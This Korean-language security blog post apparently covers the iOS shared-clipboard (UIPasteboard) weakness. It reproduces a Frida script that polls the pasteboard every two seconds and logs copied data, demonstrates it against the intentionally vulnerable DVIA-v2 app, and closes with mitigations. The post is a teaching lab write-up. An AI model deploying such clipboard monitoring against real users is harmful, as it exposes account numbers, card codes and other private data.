[iOS] Shared Clipboard 취약점

개요

iOS에서는 설치된 앱 간에 사용자의 편의성을 위한 "공유 클립보드"가 있습니다. 실행 중인 앱에서 일부 텍스트를 "복사" 또는 "잘라내기"시 -> pasteboard 버퍼에 저장되며 이는 다른 앱에서 사용하기 위해 데이터를 가져올 수 있기 때문에 조심해야 될 필요가 있습니다. 왜냐하면 앱 내부에 단순 저장되는 것이 아닌 단말 장치 내부에 버퍼 형태로 기록되기에 다른 앱을 통해 이 값을 호출하여 유출할 가능성이 있기 때문입니다.

 

서로 간에 공유할 수 있는 클립보드를 애플에서는 Pasteboard라고도 부릅니다. 사용자 관점에서 보자면 이 기능은 매우 편리하고 필수적인 역할로 자리 잡아 있습니다. 마치 긴 데이터 형태를 가지는 연락처, 주소, 카드번호 등을 사용하기 위해선 보통 복사 밑 붙여 넣기를 할 수 있기 때문입니다.

 

Example 코드

NSLog(@"clipboard = %@", [UIPasteboard generalPasteboard].string);

앱 애플리케이션에서 Clipboard를 읽기 위해선 위의 코드가 필요합니다. 적용하는 법이 까다로운 편에 속하진 않기 때문에 필요로 하는 앱이라면 대부분 적용되어 있을 겁니다.

 

이러한 편리 기능이 아무런 제약 없이 무제한 적으로 데이트에 액세스 할 수 있다면 어떤 문제가발생할 수 있을까요? 예를 들어 사용자가 마지막으로 복사한 데이터가 금융과 관련된 민감한 정보인 상태에서 안전하지 않은 곳 또는 분실한 상태로 방치될 경우 공격자는 값을 무단으로 추출하여 유출할 가능성이 있습니다.

 

취약한 앱 애플리케이션을 대상으로 테스트를 진행해보겠습니다. 값이 들어가는 부분이 계좌번호화 CVC 넘버링을 받는 페이지에서 "Copy"를 선택합니다.

 

https://github.com/interference-security/frida-scripts/blob/master/iOS/pasteboard-monitoring.js

GitHub - interference-security/frida-scripts: Frida Scripts

pasteboard 버퍼에 기록된 값을 가져오기 위해 위 링크에 첨부된 frida script를 사용하겠습니다.

 

//Twitter: https://twitter.com/xploresec
//GitHub: https://github.com/interference-security
function start_pasteboard_monitoring(interval_value)
{
    var pasteboard = (ObjC.classes.UIPasteboard).generalPasteboard();
    var latest_word = "";
    setInterval(function(){
        try
        {
        //복사된 값을 문자열 형식으로 져와서 on_pasteboard 라는 변수에 담음
            var on_pasteboard = pasteboard.string().toString() 
        //latest_word에는 기본적으로 빈 값이며 복사된 문자열과 동일하지 않으면 “Found on pasteboard”라는 콘솔로그와 함께 값이 출력됨
            if(on_pasteboard != latest_word) 
            {
                console.log("[*] Found on pasteboard: "+ on_pasteboard);
        //복사된 값은 latest_word에 다시 들어가서 비교 되기 때문에 상단의 비교문에 걸려 중복된 값이 콘솔로그에 찍히지 않게 되어 있음
                latest_word = on_pasteboard; 
            }
        }
        catch(err)
        {
            a = "";
        }
    }, interval_value);

}
//start_pasteboard_monitoring(INTERVAL_VALUE_HERE_MILLISECONDS)
start_pasteboard_monitoring(2000)

interval_value를 인자로 지정후 setInterval을 사용하여 내부 코드를 -> start_pasteboard_monitoring(2000)에 의해 2초마다 작업을 수행하도록 되어 있습니다.

 

실행 중인 프로세스를 확인해보면 DVIA-v2앱은 실행되고 있지 않으며 pasteboard 취약점이 존재할 경우 다른 애플리케이션에서도 저장된 값을 확인할 수 있습니다.

 

POC 코드를 “Safari” 애플리케이션에 attach 해보면앱에 저장되었던 개인정보가 콘솔 로그에 출력됩니다.

 

대응방안

UIPasteboard 클래스에서 기기간의 복사 데이터가 공유되는데, 저장되는 종류와 만료 시점을 최소한으로 설정하여 구현하거나 중요한 데이터를 다루는 영역은 일반적인 General Pasteboard 방식이 아닌 "Custom Pasteboard" 사용하거나 금융권에서 쉽게 볼 수 있는 "가상 키패드"를 통해 값 처리를 해주는 것이 안전합니다.